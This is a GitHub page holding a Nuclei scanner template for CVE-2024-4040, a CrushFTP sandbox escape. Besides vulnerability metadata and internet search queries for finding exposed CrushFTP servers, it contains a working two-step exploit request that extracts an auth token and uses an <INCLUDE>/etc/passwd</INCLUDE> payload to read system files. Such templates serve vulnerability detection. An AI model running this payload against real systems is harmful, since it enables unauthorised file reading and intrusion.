-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcve-2024-4040-nuclei-template.yaml
67 lines (62 loc) · 2.34 KB
/
cve-2024-4040-nuclei-template.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
id: CVE-2024-4040
info:
name: CrushFTP VFS Sandbox Escape
author: rahisec
severity: high
description: |
A vulnerability in CrushFTP (all versions before 10.7.1 and 11.1.0) on all platforms allows remote attackers with low privileges to escape the VFS sandbox and access the filesystem outside of the designated sandbox. This can lead to unauthorized access to sensitive files.
reference:
- https://github.com/rix4uni/CVE-Exploits/blob/main/CVE-2024-4040.py
- https://twitter.com/h4x0r_dz/status/1783263922453135391
- https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
- https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update
- https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update
- https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/
- https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
cve-id: CVE-2024-4040
cwe-id: CWE-20
metadata:
google-query:
- intitle:"CrushFTP WebInterface"
shodan-query:
- html:"CrushFTP"
- http.favicon.hash:"-1022206565"
- title:"CrushFTP WebInterface"
- "Server: CrushFTP HTTP Server"
censys-query:
- services.http.response.favicons.md5_hash:"297a81069094d00a052733d3a0537d18"
- services.http.response.html_title:"CrushFTP WebInterface"
fofa-query:
- icon_hash="-1022206565"
- (title="CrushFTP WebInterface")
- "Server: CrushFTP HTTP Server"
hunter-query:
- favicon_hash=="297a81069094d00a052733d3a0537d18"
verified: true
max-request: 2
tags: cve,cve2024,lfi,crushftp,vfs,sandbox-escape
http:
- raw:
- |
GET /WebInterface/ HTTP/1.1
Host: {{Hostname}}
- |
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=* HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- "root:"
extractors:
- type: regex
name: auth
internal: true
part: header
regex:
- 'currentAuth=([0-9a-zA-Z]+)'